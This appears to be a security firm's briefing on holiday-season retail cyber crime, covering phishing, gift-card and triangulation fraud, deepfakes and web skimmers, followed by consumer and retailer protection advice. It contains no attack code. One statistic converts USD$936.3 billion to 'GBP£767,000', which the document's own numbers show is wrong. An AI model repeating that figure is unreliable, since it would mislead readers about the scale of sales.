Retail Landscape and Cyber Security
HOLIDAY SEASON – KEY DATES
Singles Day – (November 11th - Ended)
Thanksgiving Sales – November 23rd
Black Friday (White Friday in some parts of the Middle East) – November 24th
Small Business Saturday – November 25th
Cyber Monday – November 27th
GLOBAL PARTICIPATION
Black Friday originated in the US in the 1980’s, as part of a post-thanksgiving sales event, and has over the years expanded into a global enterprise of sales, discounts, and promotions, thrust at consumers within a mere few days in the lead up to Christmas. One other major holiday event is the 24-hour shopping extravaganza called ‘Singles Day’, created in China to promote anti-valentines, and has since taken favour among Middle Eastern countries such the United Arab Emirates and parts of Europe such as Spain.
Across wider Europe, countries such as the UK, France, and Germany, all started to adopt Black Friday in the last three to four years, alongside central and southern American countries, China and southeastern Asia, and parts of Africa. In the Middle East, the day is marked as ‘white Friday’, a symbol of positive emotions, images and goodness.
WHAT WE KNOW SO FAR: CYBER CRIME
According to security research in 2023, some of the most common hacking tactics we will see, particularly increasing around peak holiday season sales include:
Access for sale,
Botnet attacks,
Business email compromise,
Consumer-based attacks,
Malware deployment via email,
Gift card fraud and scams,
Social engineering including phishing,
Vulnerability exploitation.
BUSINESS AND CYBER TRENDS
In 2022, The National Retail Federation reported holiday sales grew to a record number of sales USD$936.3 billion (GBP£767,000), with online traffic skyrocketing to retail sites during this period. In terms of cyber crime, an estimated GBP£10M was stolen by cyber criminals during the festive season between November 2022 – January 2023 in the UK. The age groups most likely to be targeted fall between 25 – 34, closely followed by 35 – 44 and 18 – 24.
Despite persistent levels of malicious activity online, researchers believe numbers of online shoppers will continue to increase, rising to 2.71 billion and 2.77 billion by 2024 and 2025 respectively. Coinciding with the value of global ecommerce sales, which is also showing an upward trajectory, and will likely surpass USD$7 trillion in value by 2024 (GBP£5.5T). One other finding dupes ‘mobile commerce’ (smartphone and tablet purchases), as a sector of technology innovation that will be explored for growth more in the coming years.
Shifts prevalent in the way people shop in 2023 includes live streaming, live shopping and virtual experiences using social media channels, to provide leverage when promoting products and services through real-time video content. However, the dark side of enhanced technology includes threat actors being able to generate content, referred to as ‘synthetic media / identity fraud’ enabling malicious activities through its subset of synthetic media.
This involves creation of deepfake audio and video content to dupe customers into handing over personal or financial data by pretending to be someone from authority or a close family member (the number of deepfakes reported in Q1 2023 was 10% higher than all of 2022 combined). There is also ‘Frankenstein identity’ fraud cases which involve threat actors using a real Social Security Number bought on the dark web, combined with a real name and date of birth or physical address, used to open an account on a retailer site and purchase goods using the identity and stolen credit card details.
Identity theft severely impacts the holiday season, causing mass disruption to business operations and sales, through the advent of card skimming, for example. This type of cyber crime has increased by 77% (70,000 cards to 120,000 between 2022 – 2023 stolen). Cyber criminals are known to steal credit card information from online checkout pages, or by physically stealing data at ATMs. Findings show this year, more card details per compromise event have been stolen by threat actors (48% increase in the average number of cards impacted per compromise) meaning more consumers becoming victims.
CYBER CRIME IMPACTING BLACK FRIDAY
Social engineering. An example of social engineering, which is a prevalent threat for all industries not just retail during the holiday season is phishing. This technique involves deceptive messages appearing to be from a legitimate organisation and big-name brands, often sharing promotional offers or urgent notifications, preying on consumer emotions and time. The well-crafted messages are designed to trick recipients into revealing sensitive information or to get them to download malware by clicking on malicious links attached embedded, redirecting to fake websites imitating the target organisation.
Interactive email modules. Enable consumers to cooperate and shop solely through their inbox, placing items into baskets, and accessing personalised discounts before checking out on the retailer’s website. This is likely to create more opportunity for threat actors surrounding Black Friday, with tailored emails promoting products to customers who think they are adding items to their basket and being transferred to a legitimate payment site.
Gift card fraud. Can take place through email, with fraudsters coercing shoppers to purchase gift cards under the guise of resolving issues, however, end up fleeing with the stolen funds. Fake order confirmations also peak during the holiday season and can include convincing logos and graphics from the target organisation to trick shoppers into clicking on malicious links thinking they are making contact to dispute the non-existent purchase.
Fake charity donations. During the holiday season, there is a surge in charity donations, and therefore a good time for scam activity to increase by opportunists. These types of threat actors will set up bogus charities and employ high-pressure tactics to get consumers to donate.
Spoofed websites. Created with the intention to mimic legitimate online retailers, using the same logo, branding and product descriptions, leading users into a false sense of security, who unknowingly share personal and financial information.
Organised retail crime. During the holiday season, organised criminals operate in full view, creating typo-squat domains, and websites, are active on social media and will show openness to connect with customers through fake product reviews, getting in touch by means of email, phone calls and SMS to drive sales and gain financial rewards.
Reseller bots. Bought by threat actors on the dark web, designed to scrape inventory-related data from websites and use this information to purchase excessive quantities of products from retail merchants. Bulk purchasing inventory prevents customers and retailers from gaining sales, with threat actors going onto sell products on dark web and third-party marketplaces resulting mass inventory shortages.
Triangulation fraud. Carried out by threat actors using stolen credit card details bought on the dark web. A customer unknowingly makes a purchase from a legitimate ecommerce marketplace like Amazon or eBay, and the seller turns out to be a fraudster, who after receiving the order buys the requested item from a legitimate online store using stolen credit card details from an unknown victim and ships it to the customer. The owner of the credit card requests a chargeback, while the retailer responsible for paying the chargeback fee. This often reflects poorly on retailers if receiving too many chargeback requests and decreases trust from consumers.
AI fraud (a.k.a. synthetic identity fraud). Involves impersonating a CEO or person of interest’s voice and image using deepfake technology, to persuade the target to disclose sensitive information, and transfer funds into an attacker-controlled account, or click on a malicious link enabling malware. With the advent of AI, this can enable more sophisticated and targeted cyber attacks. The National Cyber Security Centre (NCSC) in the UK issued warnings in November about Increased consumer vigilance as AI generated scams enhance the threat throughout this year’s festivities, revealing over 7 in 10 British people worry that AI will make it easier for cyber criminals to commit online fraud.
Web Skimmers. Cyber attacks can be launched by threat actors against ecommerce platforms through the Magecart malware code (Magecart is an umbrella term used for a host of cyber criminal groups, known to employ malware and target retail, consumer goods, hospitality, and travel industries checkout pages). These threat groups exploit vulnerabilities in popular third-party platforms such as Magento, WooCommerce, Shopify, and WordPress, used to power websites. The goal is to steal sensitive information including customer payment details and financial data.
CONSUMER-FOCUSED PROTECTION
Keep updated with government advice. For example, the NCSC warns shoppers to beware of phishing campaigns and online scams purporting to offer Black Friday bargains.
Implement multi-factor authentication including a strong password made up of three random words, and an authenticator code (bonus points for using biometrics and a PIN for verification).
As part of the Cyber Aware Campaign – it is important before purchasing, to research sellers on third-party sites and check if they are legitimate. Just because someone has a lot of good reviews does not mean they can be trusted, remember ‘always verify, never trust’.
Use a credit card secure platform such as PayPal, Google Pay and Apple Pay, and only provide the required amount of details at checkout (if marked with an asterisk, if not, you do not need to provide details). Remember, all information given to a cyber criminal is useful and will be used in the future, therefore limit exposure online.
Report any instances of phishing to Suspicious Email Reporting Service (SERS) at report@phishing.gov.uk. Report malicious ads to the Advertising Standards Authority (ASA) website.
Block incoming calls from a suspicious number and call your bank should you suspect you have been scammed. It is important to get the compromised card blocked and removed from any more interference. Likewise, you can verify company phone numbers on the ‘get human’ website https://gethuman.com.
Action fraud helpline - https://www.actionfraud.police.uk and https://www.scotland.police.uk.
RETAILER-FOCUSED PREVENTION
Retailers and ecommerce marketplaces are increasingly using third-party AI tools to gather data such as IP addresses, device fingerprinting (biometrics) and behavioural analytics, enabling cross-referencing of transactions made by customers across entire purchase history, to avoid fake disputes and policy abuse. This should be considered by retailers, combining efforts and pulling together data from a wide range of sources, including enhanced technology such as biometrics, to help spot the warning signs of threat actors.
Implement anti-malware and ransomware detection technologies, necessary to reduce the risk of a severe cyber attack causing operational, reputational, and financial damage to retail organisations.
Patch management, and keeping software, plugins, and third-party integrations up to date is crucial to minimise the risk of exploitation by cyber threats. Likewise, robust incident response planning should also be in place, including mitigation steps and instructions relevant teams to follow in the event of a cyber attack.
